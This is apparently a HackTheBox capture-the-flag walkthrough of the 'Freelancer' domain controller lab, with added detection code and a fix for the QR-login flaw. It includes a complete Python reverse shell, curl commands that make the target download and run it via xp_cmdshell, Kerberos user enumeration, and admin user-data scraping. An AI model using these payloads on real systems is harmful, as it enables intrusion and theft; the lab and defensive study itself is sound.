HackTheBox | Freelancer

In this walkthrough, I demonstrate how I obtained complete ownership of Freelancer on HackTheBox
In: HackTheBox, Attack, CTF, Windows, Hard Challenge

Nmap Results

# Nmap 7.94SVN scan initiated Tue Jun  4 01:43:54 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.10.11.5
Nmap scan report for 10.10.11.5
Host is up (0.011s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          nginx 1.25.5
|_http-title: Did not follow redirect to http://freelancer.htb/
|_http-server-header: nginx/1.25.5
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-04 10:45:05Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
57551/tcp open  msrpc         Microsoft Windows RPC
57555/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4h59m58s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-06-04T10:45:54
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun  4 01:46:34 2024 -- 1 IP address (1 host up) scanned in 160.12 seconds

Looking at the ports running on the machine, this is looking like a Windows Domain Controller, so we'll also be employing the typical Active Directory enumeration playbook.

We can see the redirect to http://freelancer.htb in the tcp/80 output, so let's go ahead and get that added to our /etc/hosts file.

echo -e '10.10.11.5\tfreelancer.htb' | sudo tee -a /etc/hosts





Service Enumeration

TCP/53

DNS zone transfer failed



TCP/389

Anonymous LDAP queries failed



TCP/445

Anonymous SMB login permitted, but no shares
ℹ️
Since anonymous SMB login was successful, I tried RID cycling using both crackmapexec and enum4linux, but neither was able to run with anonymous login against the target.



TCP/88

ℹ️
As mentioned previously, we can tell this is a Windows domain controller by looking at the ports open on the target. So, we'll use the Active Directory enumeration playbook as well, and do some Kerberos pre-auth enumeration.
Kerberos Pre-Auth User... | 0xBEN | Notes
kerbrute userenum -d freelancer.htb --dc freelancer.htb -t 100 -o kerbrute.log ./kerberos_users.txt
2024/06/04 02:00:10 >  Using KDC(s):
2024/06/04 02:00:10 >   10.10.11.5:88
2024/06/04 02:01:27 >  [+] VALID USERNAME:       administrator@freelancer.htb
2024/06/04 02:09:19 >  [+] VALID USERNAME:       dc2@freelancer.htb
2024/06/04 02:10:16 >  [+] VALID USERNAME:       d.jones@freelancer.htb
2024/06/04 02:11:00 >  [+] VALID USERNAME:       dthomas@freelancer.htb
2024/06/04 02:12:05 >  [+] VALID USERNAME:       ereed@freelancer.htb
2024/06/04 02:15:59 >  [+] VALID USERNAME:       hking@freelancer.htb
2024/06/04 02:18:17 >  [+] VALID USERNAME:       jgreen@freelancer.htb
2024/06/04 02:18:33 >  [+] VALID USERNAME:       jmartinez@freelancer.htb
2024/06/04 02:24:42 >  [+] VALID USERNAME:       michael.williams@freelancer.htb
2024/06/04 02:27:31 >  [+] VALID USERNAME:       olivia.garcia@freelancer.htb
2024/06/04 02:31:38 >  [+] VALID USERNAME:       sdavis@freelancer.htb
2024/06/04 02:33:25 >  [+] VALID USERNAME:       sshd@freelancer.htb
2024/06/04 02:34:28 >  [+] VALID USERNAME:       taylor@freelancer.htb
2024/06/04 02:37:28 >  [+] VALID USERNAME:       wwalker@freelancer.htb
2024/06/04 02:38:14 >  Done! Tested 8106127 usernames (14 valid) in 2283.182 seconds
ℹ️
With this list of users handy, now would be a good time to see if any of them have Kerberos pre-authentication disabled on their AD accounts (AS-REP roasting).
grep '@' kerbrute.log | awk -v FS=' ' '{print $7}' | cut -d '@' -f 1 > asrep.txt
impacket-GetNPUsers -usersfile asrep.txt -no-pass -dc-ip 10.10.11.5 freelancer.htb/
Worth a shot, but no luck this time
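From the defender's side, the kerbrute run above is loud: every candidate name is an AS-REQ the domain controller records as event 4768, with KDC_ERR_C_PRINCIPAL_UNKNOWN (0x6) for names that do not exist and KDC_ERR_PREAUTH_REQUIRED (0x19) for names that do. The following detection is an added example (not from the original post); it assumes 4768 events exported as JSON lines with the EventData field names Windows uses, and the sample events are constructed.

```python
"""Detect Kerberos pre-auth user enumeration from Windows event ID 4768.

Added example, not from the original post. kerbrute userenum sends one AS-REQ
per candidate name; the KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN (0x6) for
names that do not exist and KDC_ERR_PREAUTH_REQUIRED (0x19) for names that
do, and the DC records each answer as a 4768 event carrying that status. A
burst of 0x6 results from one source address is the signal, and the 0x19
results in the same burst are the names the scanner has just confirmed.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

ERR_PRINCIPAL_UNKNOWN = "0x6"   # name does not exist
ERR_PREAUTH_REQUIRED = "0x19"   # name exists, pre-auth demanded
SUCCESS = "0x0"


def parse_4768(lines):
    """Load JSON-exported 4768 events (EventData field names), oldest first."""
    events = []
    for line in lines:
        ev = json.loads(line)
        if ev.get("EventID") == 4768:
            ev["ts"] = datetime.fromisoformat(ev["TimeCreated"])
            events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def detect_userenum(lines, window=timedelta(seconds=60), threshold=20):
    """Flag source IPs that produced >= threshold unknown-principal results
    within `window`; list the existing names they touched in that burst."""
    by_ip = defaultdict(list)
    for ev in parse_4768(lines):
        by_ip[ev["IpAddress"]].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        unknown = [e for e in evs if e["Status"] == ERR_PRINCIPAL_UNKNOWN]
        start = 0
        for end in range(len(unknown)):            # sliding window
            while unknown[end]["ts"] - unknown[start]["ts"] > window:
                start += 1
            if end - start + 1 < threshold:
                continue
            lo, hi = unknown[0]["ts"] - window, unknown[-1]["ts"] + window
            confirmed = sorted({e["TargetUserName"] for e in evs
                                if e["Status"] == ERR_PREAUTH_REQUIRED
                                and lo <= e["ts"] <= hi})
            alerts[ip] = {"first_seen": unknown[0]["TimeCreated"],
                          "unknown_names": len(unknown),
                          "confirmed_names": confirmed}
            break
    return alerts


def build_sample_events():
    """Constructed sample: a scanner at 10.10.14.6 tries 30 names in one
    minute (3 exist), while a workstation logs on normally over an hour."""
    t0 = datetime(2024, 6, 4, 2, 0, 10)
    valid = {"administrator", "dthomas", "sshd"}
    names = [f"user{i:02d}" for i in range(27)] + sorted(valid)
    lines = []
    for i, name in enumerate(names):
        lines.append(json.dumps({
            "TimeCreated": (t0 + timedelta(seconds=2 * i)).isoformat(),
            "EventID": 4768, "TargetUserName": name,
            "IpAddress": "::ffff:10.10.14.6",
            "Status": ERR_PREAUTH_REQUIRED if name in valid else ERR_PRINCIPAL_UNKNOWN}))
    for i in range(5):
        lines.append(json.dumps({
            "TimeCreated": (t0 + timedelta(minutes=10 * i)).isoformat(),
            "EventID": 4768, "TargetUserName": "dthomas",
            "IpAddress": "::ffff:10.129.0.50", "Status": SUCCESS}))
    return lines


if __name__ == "__main__":
    for ip, info in detect_userenum(build_sample_events()).items():
        print(f"{ip}: {info['unknown_names']} unknown names from "
              f"{info['first_seen']}, confirmed {info['confirmed_names']}")
```

The threshold and window are tuning knobs; a real list like the one kerbrute used here produces thousands of 0x6 results from one address in minutes, so the defaults are conservative.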



TCP/80

Possible username / email that we should take inventory of

Gobuster Enumeration

Directories and Files

gobuster dir -u http://freelancer.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 25 --delay 100ms -o freelancer.txt
/about                (Status: 301) [Size: 0] [--> /about/]
/admin                (Status: 301) [Size: 0] [--> /admin/]
/blog                 (Status: 301) [Size: 0] [--> /blog/]
/contact              (Status: 301) [Size: 0] [--> /contact/]
ℹ️
I tried enumerating virtual hosts on the target as well, but there was some obvious rate-limiting and I stopped the scan halfway, since it seemed like that was not going to be fruitful.



Employer Account Verification Bypass

ℹ️
Up until this point, I had been trying lots of different payloads in different input points, but there appears to be a WAF reviewing and sanitizing inputs. So, I shelved that strategy and decided to look at different bypass methods.
I've actually seen this on production websites. Not necessarily account activation, but you create an account and you can't log in, so you use the password reset function and then it works.
  1. Register for a new employer account
  2. Attempt to login
  3. Account is not activated
  4. Click password reset button
  5. Fill out form
  6. Complete password reset form
  7. We are now logged in



Exploring the Employer Portal

The QR-Code menu in the left-pane is quite interesting, as the verbiage states:

Use your mobile phone to scan this QR-Code to login to your account without using any type of credentials. Please note that this QR-Code is valid for 5 Minutes only.

Logging in without using any type of credentials? Very interesting.

Choose Search image with Google
Google Lens conveniently decodes the QR code for us
The base64 payload in the URL is our user ID of 10012



Finding the Admin User ID

If you go back to the home screen, you'll note the section about a quarter of the way down that shows the featured freelancers.

ℹ️
If you hover over the More Info button, you'll notice the URL follows a pattern of http://freelancer.htb/accounts/profile/visit/ followed by the user ID

If we try changing the user ID portion of the URL, we may be able to find the admin user. Usually the admin user has a very low ID number.

  • http://freelancer.htb/accounts/profile/visit/1/ = HTTP 404
  • http://freelancer.htb/accounts/profile/visit/2/ = Admin



Alter the QR Code and Become Admin

echo '2' | basenc --base64url

Let's see what happens if we alter the URL embedded in the QR code and swap our user ID with the admin user's base64-encoded user ID.

http://freelancer.htb/accounts/login/otp/Mgo=/75ef5b77fdb67b1f69f1141936623018/
  1. Open an incognito window or different browser
  2. Paste the URL into the address bar and navigate to the page
  3. You should now be admin
ℹ️
Upon logging in with the QR code, we also now possess the admin user's session and CSRF token, so we can do things as the admin user
Because we hold the admin session and CSRF token, we can now open the /admin page
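The root cause of the QR login bypass is that the two parts of the link are independent: the base64 segment carries the user ID and the hex segment is a token that is never tied to that ID, so swapping the ID keeps a valid token. The following is an added example, not the Freelancer application's code, showing one way to bind a 5-minute passwordless login link to its account with an HMAC; the secret, path layout and in-memory replay set are assumptions for the example.

```python
"""Binding a passwordless QR login link to the account it was issued for.

Added example, not the Freelancer application's code. The link shown above,
/accounts/login/otp/<base64 user id>/<token>/, lets the user id be swapped
because the token is not tied to it. Below, the id and an expiry ride inside
one base64url payload and the token is an HMAC over that payload, so changing
either without the server secret fails verification; tokens are also consumed
on first use so a scanned link cannot be replayed.
"""
import base64
import hashlib
import hmac
import secrets
import time

TOKEN_TTL = 5 * 60          # the page says the QR code is valid for 5 minutes
PREFIX = ["accounts", "login", "otp"]


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64url(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_login_url(user_id: int, secret: bytes, now=None) -> str:
    """Build the path embedded in the QR code for `user_id`."""
    now = int(time.time() if now is None else now)
    payload = f"{user_id}.{now + TOKEN_TTL}.{secrets.token_hex(8)}".encode()
    tag = hmac.new(secret, payload, hashlib.sha256).hexdigest()
    return f"/accounts/login/otp/{_b64url(payload)}/{tag}/"


def tamper_user_id(path: str, new_user_id: int) -> str:
    """Re-encode the payload with another user id but keep the original tag
    (the id swap attempted in the walkthrough), to show it is rejected."""
    parts = path.strip("/").split("/")
    _, expires, nonce = _unb64url(parts[3]).decode().split(".")
    parts[3] = _b64url(f"{new_user_id}.{expires}.{nonce}".encode())
    return "/" + "/".join(parts) + "/"


class QrLoginVerifier:
    def __init__(self, secret: bytes):
        self._secret = secret
        self._used = set()   # consumed tags; a real service keeps these with a TTL

    def verify(self, path: str, now=None):
        """Return the user id the link logs in, or None if it must be rejected."""
        parts = path.strip("/").split("/")
        if len(parts) != 5 or parts[:3] != PREFIX:
            return None
        try:
            payload = _unb64url(parts[3])
            user_id, expires, _nonce = payload.decode().split(".")
            user_id, expires = int(user_id), int(expires)
        except (ValueError, UnicodeDecodeError):
            return None
        expected = hmac.new(self._secret, payload, hashlib.sha256).hexdigest()
        # constant-time compare; a swapped id changes the payload, so the tag no longer matches
        if not hmac.compare_digest(expected, parts[4]):
            return None
        now = int(time.time() if now is None else now)
        if now > expires or parts[4] in self._used:
            return None
        self._used.add(parts[4])
        return user_id
```

Compare with the page's own link: the bare base64 "Mgo=" segment has no expiry or MAC to check, which is exactly what made the swap succeed.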



Exploring the Freelancer Admin Portal

Exporting the User Data

ℹ️
The users' passwords and security questions are hashed, but we should be able to grab these and archive them for cracking and future reference
mkdir userdata

Create a directory to store the user data

# Store the base url and cookie data in a variable
BASE_URL='http://freelancer.htb'
SESSION='Cookie: csrftoken=MynpPuocQK7WdNf6bPZtKbqpCbcL9rmD; sessionid=fw0yjcnrv7ia96ikpnjdmirj7ex1e1hq'

# Fetch all of the user urls and store them in an array
# ("$SESSION" must be double-quoted: the header value contains spaces)
user_paths=( $(curl -s -H "$SESSION" "${BASE_URL}/admin/freelancer/customuser/" | grep -o '\/admin\/freelancer\/customuser\/.*\/change') )

# For loop over each user URL
# ("${user_paths[@]}" expands every element; a bare $user_paths only yields the first)
for user_path in "${user_paths[@]}" ; do
    # Store a full URL in a variable for parsing
    user_url="${BASE_URL}${user_path}"
    # Filter out the user ID using string manipulation
    user_id=$(echo "$user_url" | rev | cut -d '/' -f 2 | rev)
    # Grab the user data from the URL and save it in a file
    # Use `grep`, `cut`, and `tr` to parse out the values
    curl -s -H "$SESSION" "${BASE_URL}${user_path}/" | tr '>' '\n' | grep input | grep -E 'name="(username|email|password)"' | cut -d ' ' -f 4 | tr -d '"' | cut -d '=' -f 2 > "./userdata/${user_id}.txt"
done

Use curl and my session cookie to grep all user URLs



Exploring the SQL Terminal

The error message makes it clear that the DBMS is MSSQLSERVER
1433 - Pentesting MSSQL - Microsoft SQL Server | HackTricks
MSSQL AD Abuse | HackTricks
Permission denied
ℹ️
Working my way down the HackTricks page, I found that I can impersonate the sa (system admin) user
Before
After



Getting Command Execution via SQL

Let's make ourselves sysadmin
Verifying privilege escalation
Enable advanced options
Enable xp_cmdshell
We've got command execution!
sudo impacket-smbserver -smb2support evil .

Start an SMB server and see if we can capture an NTLM hash

Capture the NTLM hash for the sql_svc account
⚠️
Unfortunately, this hash did not crack with rockyou.txt, but I'll keep it handy just in case





Exploit

Optimizing the XP_CMDSHELL Calls

ℹ️
You'll notice eventually that the xp_cmdshell feature does not stay enabled, likely to preserve the challenge for other users on the box. We can use the requests captured via Burp to automate issuing commands via xp_cmdshell.
Here is one of the requests to enable the advanced options
💡
This app is running on Django, which you can infer from the CSRF scheme it uses (the csrftoken cookie and the csrfmiddlewaretoken form field)
nano sh.py

Change your VPN IP and port in the script file

sh.py

import socket, subprocess, threading
def s2p(s, p):
    while True:
        data = s.recv(1024)
        if len(data) > 0:
            p.stdin.write(data)
            p.stdin.flush()

def p2s(s, p):
    while True:
        s.send(p.stdout.read(1))

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.6",443))

p=subprocess.Popen(["powershell"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)

s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()

p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()

try:
    p.wait()
except KeyboardInterrupt:
    s.close()
sudo python3 -m http.server 80

Start a Python HTTP server to host the sh.py script

BASE_URL='http://freelancer.htb/admin/'
SQL_URL="${BASE_URL}executeRawSql/"

# Cookie from Burp request
COOKIE='Cookie: csrftoken=EywnlO2I7ZvU2blMEmDNkXXi0ZjacTdU; sessionid=h72scfdmxdaytym4uyh1oq568fg5vupa'
# csrfmiddlewaretoken from Burp request
csrfmwt='dUUnUICi1hw14oZkl8VHNqLFF6zbhXc4HigA5muQY6RLWpaWPkokXdyNvVIbjGfO'

# Enable advanced features ("$COOKIE" must be quoted: the header value contains spaces)
curl -s -H "$COOKIE" "$SQL_URL" \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-d "query=sp_configure+'show+advanced+options'%2C+'1'%0ARECONFIGURE&csrfmiddlewaretoken=${csrfmwt}"

# Enable xp_cmdshell
curl -s -H "$COOKIE" "$SQL_URL" \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-d "query=sp_configure+'xp_cmdshell'%2C+'1'%0ARECONFIGURE&csrfmiddlewaretoken=${csrfmwt}"

# Issue xp_cmdshell command: fetch sh.py from our HTTP server
command='powershell -nop -c "iwr http://10.10.14.6/sh.py -o C:/Windows/Tasks/sh.py"'
curl -s -H "$COOKIE" "$SQL_URL" \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-d "query=EXEC+master..xp_cmdshell+'${command}';&csrfmiddlewaretoken=${csrfmwt}"

# Issue xp_cmdshell command: run sh.py with the target's python
command='python C:/Windows/Tasks/sh.py'
curl -s -H "$COOKIE" "$SQL_URL" \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-d "query=EXEC+master..xp_cmdshell+'${command}';&csrfmiddlewaretoken=${csrfmwt}"

Download sh.py to the target and run it to get the reverse shell
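Both the manual enable sequence in the SQL terminal and the automated curl calls above leave the same trace on the server: each sp_configure change writes a "Configuration option ... changed from X to Y" line to the SQL Server ERRORLOG. The parser below is an added example (not from the original post) that flags those enables over a constructed ERRORLOG excerpt; the option names are real sp_configure options, the spids and timestamps are made up.

```python
"""Spot xp_cmdshell (and similar options) being switched on in a SQL Server ERRORLOG.

Added example, not from the original post. Each sp_configure change writes
"Configuration option '<name>' changed from <old> to <new>." to the ERRORLOG,
so the enable sequence used above leaves two lines from the same spid a
fraction of a second apart: 'show advanced options' 0 -> 1, then 'xp_cmdshell'
0 -> 1. The parser flags every enable of a watched option and records whether
the same spid flipped 'show advanced options' shortly before, which is the
fingerprint of an interactive enable rather than a deployment script.
"""
import re
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+(?P<spid>\S+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)
# options that give the SQL Server service account OS- or network-level reach
WATCHED = {"xp_cmdshell", "Ole Automation Procedures",
           "clr enabled", "Ad Hoc Distributed Queries"}


def find_dangerous_enables(lines, lookback=timedelta(minutes=5)):
    """Return one record per watched option going from 0 to non-zero."""
    advanced_on = {}     # spid -> time 'show advanced options' was last enabled
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
        spid, option = m["spid"], m["option"]
        enabled = m["old"] == "0" and m["new"] != "0"
        if option == "show advanced options" and enabled:
            advanced_on[spid] = ts
        elif option in WATCHED and enabled:
            prior = advanced_on.get(spid)
            findings.append({
                "time": m["ts"], "spid": spid, "option": option,
                "preceded_by_advanced": prior is not None and ts - prior <= lookback,
            })
    return findings


# Constructed ERRORLOG excerpt in the real file's line layout
SAMPLE_ERRORLOG = """\
2024-06-07 00:29:29.10 Server      Server process ID is 4120.
2024-06-07 00:31:12.45 spid54      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-06-07 00:31:12.60 spid54      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-06-07 00:35:00.00 spid61      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2024-06-07 00:40:00.00 spid70      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-06-07 00:41:00.00 spid70      Configuration option 'clr enabled' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

if __name__ == "__main__":
    for f in find_dangerous_enables(SAMPLE_ERRORLOG.splitlines()):
        flag = "after 'show advanced options'" if f["preceded_by_advanced"] else "direct"
        print(f"{f['time']} {f['spid']}: {f['option']} enabled ({flag})")
```

The 1 -> 0 line in the sample is the kind of periodic reset the author noticed; the ERRORLOG only shows the flip, so the commands themselves have to be captured with a SQL Server Audit or an Extended Events session.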





Post-Exploit Enumeration

Operating Environment

OS & Kernel

Host Name:                 DC
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00429-00521-62775-AA664
Original Install Date:     5/28/2024, 10:25:02 AM
System Boot Time:          6/7/2024, 12:29:29 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
                           [02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,224 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 2,872 MB
Virtual Memory: In Use:    1,927 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    freelancer.htb
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.129.0.1
                                 IP address(es)
                                 [01]: 10.129.127.251
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.    

Current User

USER INFORMATION
----------------
User Name          SID                                           
================== ==============================================
freelancer\sql_svc S-1-5-21-3542429192-2036945976-3483670807-1114
GROUP INFORMATION
-----------------
Group Name                                 Type             SID                                                             Attributes                                        
========================================== ================ =============================================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                                         Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                                    Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6                                                         Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                                        Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS                Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner    
LOCAL                                      Well-known group S-1-2-0                                                         Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                                        Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288                                                                                                      
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeCreateGlobalPrivilege       Create global objects          Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.    



Users and Groups

Domain Users

samAccountName    UserPrincipalName              
--------------    -----------------              
Administrator                                    
Guest                                            
krbtgt                                           
mikasaAckerman    mikasa.ackerman@freelancer.htb 
sshd                                             
SQLBackupOperator                                
sql_svc                                          
lorra199                                         
maya.artmes       maya.artmes@freelancer.htb     
michael.williams  michael.williams@freelancer.htb
sdavis            sdavis@freelancer.htb          
d.jones           d.jones@freelancer.htb         
jen.brown         jen.brown@freelancer.htb       
taylor            taylor@freelancer.htb          
jmartinez         jmartinez@freelancer.htb       
olivia.garcia     olivia.garcia@freelancer.htb   
dthomas           dthomas@freelancer.htb         
sophia.h          sophia.h@freelancer.htb        
Ethan.l           Ethan.l@freelancer.htb         
wwalker           wwalker@freelancer.htb         
jgreen            jgreen@freelancer.htb          
evelyn.adams      evelyn.adams@freelancer.htb    
hking             hking@freelancer.htb           
alex.hill         alex.hill@freelancer.htb       
samuel.turner     samuel.turner@freelancer.htb   
ereed             ereed@freelancer.htb           
leon.sk           leon.sk@freelancer.htb         
carol.poland      carol.poland@freelancer.htb    
lkazanof          lkazanof@freelancer.htb    

Domain Groups

Administrators
--------------
CN=Domain Admins,CN=Users,DC=freelancer,DC=htb
CN=Enterprise Admins,CN=Users,DC=freelancer,DC=htb
CN=Administrator,CN=Users,DC=freelancer,DC=htb


Users
-----
CN=Domain Users,CN=Users,DC=freelancer,DC=htb
CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=freelancer,DC=htb
CN=S-1-5-4,CN=ForeignSecurityPrincipals,DC=freelancer,DC=htb


Guests
------
CN=Domain Guests,CN=Users,DC=freelancer,DC=htb
CN=Guest,CN=Users,DC=freelancer,DC=htb


Performance Monitor Users
-------------------------
CN=Daniel Thomas,CN=Users,DC=freelancer,DC=htb
CN=Maya Artmes,CN=Users,DC=freelancer,DC=htb


Performance Log Users
---------------------
CN=Daniel Thomas,CN=Users,DC=freelancer,DC=htb


Event Log Readers
-----------------
CN=Michael Williams,CN=Users,DC=freelancer,DC=htb


Remote Management Users
-----------------------
CN=Liza Kazanof,CN=Users,DC=freelancer,DC=htb
CN=William Walker,CN=Users,DC=freelancer,DC=htb
CN=Daniel Thomas,CN=Users,DC=freelancer,DC=htb
CN=Michael Williams,CN=Users,DC=freelancer,DC=htb
CN=Lorra Armessa,CN=Users,DC=freelancer,DC=htb


Schema Admins
-------------
CN=Administrator,CN=Users,DC=freelancer,DC=htb


Enterprise Admins
-----------------
CN=Administrator,CN=Users,DC=freelancer,DC=htb


Domain Admins
-------------
CN=Administrator,CN=Users,DC=freelancer,DC=htb


Group Policy Creator Owners
---------------------------
CN=Administrator,CN=Users,DC=freelancer,DC=htb


Server Operators
----------------
CN=Jessica Martinez,CN=Users,DC=freelancer,DC=htb


Account Operators
-----------------
CN=Liza Kazanof,CN=Users,DC=freelancer,DC=htb
CN=Evelyn Adams,CN=Users,DC=freelancer,DC=htb
CN=Joseph Green,CN=Users,DC=freelancer,DC=htb
CN=Jessica Martinez,CN=Users,DC=freelancer,DC=htb


Pre-Windows 2000 Compatible Access
----------------------------------
CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=freelancer,DC=htb


Incoming Forest Trust Builders
------------------------------
CN=William Walker,CN=Users,DC=freelancer,DC=htb


Windows Authorization Access Group
----------------------------------
CN=S-1-5-9,CN=ForeignSecurityPrincipals,DC=freelancer,DC=htb


Denied RODC Password Replication Group
--------------------------------------
CN=Read-only Domain Controllers,CN=Users,DC=freelancer,DC=htb
CN=Group Policy Creator Owners,CN=Users,DC=freelancer,DC=htb
CN=Domain Admins,CN=Users,DC=freelancer,DC=htb
CN=Cert Publishers,CN=Users,DC=freelancer,DC=htb
CN=Enterprise Admins,CN=Users,DC=freelancer,DC=htb
CN=Schema Admins,CN=Users,DC=freelancer,DC=htb
CN=Domain Controllers,CN=Users,DC=freelancer,DC=htb
CN=krbtgt,CN=Users,DC=freelancer,DC=htb


Cloneable Domain Controllers
----------------------------
CN=William Walker,CN=Users,DC=freelancer,DC=htb


DnsAdmins
---------
CN=Liza Kazanof,CN=Users,DC=freelancer,DC=htb
CN=Olivia Garcia,CN=Users,DC=freelancer,DC=htb


IT Technicians
--------------
CN=Carol Poland,CN=Users,DC=freelancer,DC=htb
CN=Sarah Davis,CN=Users,DC=freelancer,DC=htb


Help Desk
---------
CN=Samuel Turner,CN=Users,DC=freelancer,DC=htb
CN=Harper King,CN=Users,DC=freelancer,DC=htb


Freelancer_WebApp Developers
----------------------------
CN=Alexander Hill,CN=Users,DC=freelancer,DC=htb
CN=Ethan Lewis,CN=Users,DC=freelancer,DC=htb
CN=Jennifer Brown,CN=Users,DC=freelancer,DC=htb
CN=David Jones,CN=Users,DC=freelancer,DC=htb


AD Recycle Bin
--------------
CN=Lorra Armessa,CN=Users,DC=freelancer,DC=htb    



Network Configurations

Network Interfaces

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.190.213
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1    

Open Ports

LocalAddress   LocalPort
------------   ---------
::                   593
::                   464
::                   445
::                  5985
::                 47001
::                 49664
::                    88
::                 52090
::                 55297
::                 49670
::                 49677
::                 52086
::1                   53
0.0.0.0            49671
0.0.0.0              389
0.0.0.0            49669
0.0.0.0               80
0.0.0.0              135
0.0.0.0            49672
0.0.0.0            49667
0.0.0.0             3268
0.0.0.0             9389
0.0.0.0             3269
0.0.0.0            49665
0.0.0.0            49666
